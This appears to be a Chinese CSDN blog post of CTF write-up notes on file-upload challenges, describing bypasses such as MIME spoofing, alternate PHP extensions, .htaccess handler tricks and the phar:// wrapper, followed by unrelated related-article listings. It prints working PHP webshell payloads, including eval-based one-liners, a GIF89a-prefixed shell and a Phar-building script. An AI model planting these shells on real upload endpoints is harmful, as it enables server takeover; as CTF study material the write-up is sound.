文件上传刷题

最新推荐文章于 2024-01-16 23:50:54 发布
最新推荐文章于 2024-01-16 23:50:54 发布
阅读量87 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mo2901600657/article/details/134529065
版权

1.[SWPUCTF 2021 新生赛]easyupload1.0

MIME验证不必多说

flag在phpinfo里面

 2.[SWPUCTF 2021 新生赛]easyupload2.0

后缀名是.php .php3 4 5 .pht phtml 都是指向php解析器

 

3.[SWPUCTF 2021 新生赛]easyupload3.0

传个shell.jpg和,.htaccess直接把shell.jpg解析为php

 4.[LitCTF 2023]作业管理系统

 就加了一个弱密码admin/admin其他跟上面一样的

5.[NISACTF 2022]bingdundun~

文件上传的奇葩,玩得好花。

仅可以上传墩墩喜欢的【图片或压缩包】文件类型哦

bp改包发现是白名单。

上传图片没有hatccess文件大概率行不通,只能看看压缩包了。在压缩包里面放个马

NSSCTF标签伪协议和phar,大概就是用phar伪协议
上传一个里面放有马的压缩包上传,然后用phar去读取

?bingdundun=phar://69033c43578ef97b1f22affbd929ad16.zip/1   (表示读取压缩里面的1.php)
然后还是上蚁剑。
后面发现,phar也可以。但是要写生成脚本。这里赋一个。

<?php
    $phar = new Phar("phar.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>"); 
    $phar->addFromString("exp.php", "<?php eval(\$_GET['1']);"); //添加要压缩的文件,有时候会用到读取这里面的
    $phar->stopBuffering();

 


6.[GXYCTF 2019]BabyUpload
MIME上传个.htaccess

 不让上传带有<?php的,这里用下面的绕过

<script language='php'>@eval($_POST["a"]);</script>

7. [UUCTF 2022 新生赛]ez_upload

后缀用jpg.php

 

 8.[SWPUCTF 2022 新生赛]Ez_upload Leafzuz

MIME验证加后缀黑名单加文件内容过滤

 

9. [WUSTCTF 2020]CV Maker

(题目漏洞,flag放在phpinfo里面)网站刚好有一个phpinfo.php

注册后可以修改头像。会对文件头检查,我这直接在一个真实图片的后面插入一个马

 

 10.[SWPUCTF 2022 新生赛]file_master Leafzuz的WriteUp

读取index.php   过滤条件:MIME,文件头,图片很小,不能有php

和上题一样直接拿一个真实的小图,在后面加上不含php的马

 

 

 

 

<?=
@eval($_REQUEST["cmd"]); 
?>

GIF89a
<script language ="php"> phpinfo();eval($_REQUEST['cmd']); </script>

<FilesMatch "shell">
SetHandler application/x-httpd-php
</FilesMatch>

 

奫M
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
基于.NET的在线考试系统源代码
03-18
分享一个基于.NET的在线考试系统,有完整的源代码和脚本文件,可以做二次开发,有管理员,教师和学生三种角色,教师后台可以批量上,发布试卷,批改试卷,统计导出成绩等 功能很全面,除了在线和考试...
南极狼系统2.0版
05-23
前段时间上了南极狼系统1.5beta版。感谢大家厚爱,在这里谢谢大家。这几天抽空进行了改进。发布了2.0版。更新内容如下: 1.在上方菜单处设置了设置功能,更改背景功能归入其中。 2.修改了错误并改善了外形...
全网最细安洵杯2019 不是文件笔记
m0_74925562的博客
12-24 1334
可以看出filename变量最终是由时间随机生成的文件名加上白名单后缀,而title值没有进行过滤,直接拼接文件名的名字去掉后缀,那我们就应该这样想,是不是可以构造恶意文件名,达到特殊的目的,我们继续往下看。没有经过过滤入了数组,然后数组被入数据库中,然后当反序列化时利用sql语句提前闭合,来使反序列化的对象为。的触发条件是当对象被销毁时,这里肯定是需要反序列化的,用seay的全局查找功能找一下反序列化函数。将图像属性的长和高进行序列化,然后再统一存进数据库中,我们来分析一下存入数据库的函数。
【Web】CTFSHOW 文件记录(全)
最新发布
uuzeray的博客
01-16 1662
期末考完终于可以好好学ctf了,先把这些该回顾的回顾完,直接rushjava!
文件包含的提升
csjjjd的博客
12-18 452
直接看if的条件就可以知道一定要设置cookie,因为这里存在着文件包含,拿到目后啥也没有,所以也不知道要读取啥文件,那就查看源代码。这里因为要写入cookie,而且首页还提示了网站首页目录。已经开始入门了文件包含,那现在开始拔高提升!看来我上一篇文章的就知道,直接伪协议开始读取,这个是基本的格式啊,祝大家CTF玩的开心。
CTFshow日记-WEB-文件
Love&Share
09-08 1454
web151-前端绕过 简单只要在前端把exts:png改成php exts:'php' 访问 /upload/shell.php?shell=system("tac ../flag.php"); web152-content-type绕过 这次不改前端了,直接在bp改,将Content-Type改成 image/png 总结下常见conten-type类型 常见的媒体格式类型如下: text/html : HTML格式 text/plain :纯文本格式 text/xml : XML格式 im
简单的文件步骤
qq_60905276的博客
11-25 3025
1.看php类型的后缀名可以上吗?如果不行就试试图片类型。 2.看有没有对内容的要求,比如说禁用<?或者禁用<script> 标签,再不行试试短标签<% 3.如果是上图片类型的文件,是要用.htaccess文件还是要改包。 4.实在不行看php版本是不是有版本漏洞,比如00截断之类的。 文件学习告一段落。 ...
springboot 上文件解析入库_全面解析SpringBoot文件功能
weixin_36289742的博客
12-30 241
这些天忙着,又怕遗忘了spring boot, 所以抽出一点时间折腾折腾,加深点印象。spring boot 的文件与 spring mvc 的文件基本一致,只需注意一些配置即可。环境要求: Spring Boot v1.5.1.RELEASE + jdk1.7 + myeclipse1).引入thymeleaf,支持页面跳转org.springframework.bootspring...
ctfshow 文件
YkingH的博客
02-02 1148
以ctfshow平台为例介绍CTF比赛中文件的常见姿势
BUU
your_friends的博客
10-05 182
可以想到,因为目里面给出了文件的路径也就是$this->filename_tmp我们是知道的,我们如果可以控制$this->filename的话我们就可以控制上的后缀。第二层判断是要他不完全等于png,但是他的判断方法跟上面的又完全不同,getimagesize返回的是图片信息等的数据。里面是一个xml示例文档,这里跟外面上goon功能下面的是一样的,也就是我们需要上一个xml文件。那么如果我们让他检测的结果不全等就行了,向上看看代码,发现他是由getimagesize来的,
详细全面的 SpringBoot 文件
热门推荐
小浩子的博客
03-02 12万+
这些天忙着,又怕遗忘了spring boot, 所以抽出一点时间折腾折腾,加深点印象。 spring boot 的文件与 spring mvc 的文件基本一致,只需注意一些配置即可。 环境要求: Spring Boot v1.5.1.RELEASE + jdk1.7 + myeclipse1).引入thymeleaf,支持页面跳转 <!-- 添加thymeleaf
谷歌师兄的leetcode笔记-gcs-resumable-upload:使用内置的可恢复行为将文件到GoogleCloudStora
06-30
使用内置的可恢复行为将文件到 Google Cloud Storage $ npm install gcs-resumable-upload const { upload } = require ( 'gcs-resumable-upload' ) ; const fs = require ( 'fs' ) ; fs . createReadStream ( '...
程序员考试-Js-Test:JS测试
07-07
中创建一个新项目并将文件到那里。 然后将指向该 github 项目的链接发送到 @Rob van Kruijsdijk on slack。 等级 每个问都有一定数量的与该问相关的分数。 明智地花费你的时间,如果你被一个问卡住了,...
谷歌师兄的leetcode笔记-scp-ocr-upload:Docker容器,通过SCP接收PDF文件,对它们进行OCR,并将它们上
06-30
谷歌师兄的leetcode笔记SCP/SFTP->OCR->Google Drive 这是一个 docker ...并将生成的文件到 Google Drive。 设置 容器需要几个环境变量: GDRIVE_AUTH_JSON:拥有 GDrive 文件夹的 GCP 服务帐户
谷歌师兄的leetcode笔记-BigBellyBrother:前端开发
06-30
谷歌师兄的leetcode笔记自述文件 Big Belly Brother 是莱斯特当地餐馆的网站。 它预览来自不同用户的评论,包括我自己。 该网站的目的是帮助其他用户找到 Leicester Local 的好去处。 线框和灵感我附上了一个...
SpringBoot+layui 知识分享小程序
11-02
1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合...
程序员5个网站-single-use:轻松生成受保护的、一次性使用的下载。允许一个文件只下载一次
07-07
5个程序员网站一次性使用下载脚本 演示 简短的 编写此脚本是为了让非程序员能够创建一种安全的方式来共享单个文件,这是一种非常简单的方法。...所有文件都必须上到服务器上的目录。 此目录的权限必
程序员面试的书哪个好-firefly_study:仅供学习
07-07
程序员面试的书哪个好 游戏服务器学习笔记1------介绍firefly,twisted 实在对不住大家,我不会编辑README.md 。 这篇文字是用mac版本的word编辑的,粘贴到这里以后很多地方格式都乱了,尤其是代码非常影响阅读...
使用python对excel文件进行
07-27
你可以使用以下代码来使用Python对Excel文件进行: ```python import pandas as pd import random df = pd.read_excel('Math.xlsx') hang = random.randint(0, int(df.shape\[0\])-1) print("目是", list(df.iloc\[hang\])\[1\]) print("选项是", list(df.iloc\[hang\])\[3:7\]) x = input("请从A,B,C,D四个选项中选出正确答案") if x == list(df.iloc\[hang\])\[2\]: print("回答正确") else: print("回答错误") ``` 首先,使用`pd.read_excel()`方法读取Excel数据,并将数据存储在一个Pandas的DataFrame对象中。然后,使用`random.randint()`方法生成一个随机数,该随机数的范围为DataFrame的行数。随机数生成后,使用`df.iloc\[\]`方法选择该行数据,并使用`list()`方法将该行数据转换为列表,然后使用索引取出目和选项。接着,使用`input()`方法让用户输入答案,并将用户输入的答案与正确答案进行比较,如果相同则输出"回答正确",否则输出"回答错误"。\[1\]\[2\] #### 引用[.reference_title] - *1* *2* [库随机出(python+excel)](https://blog.csdn.net/qq_59335499/article/details/124651718)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Python批量提取Excel文件中所有单元格批注](https://blog.csdn.net/oh5W6HinUg43JvRhhB/article/details/107031382)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值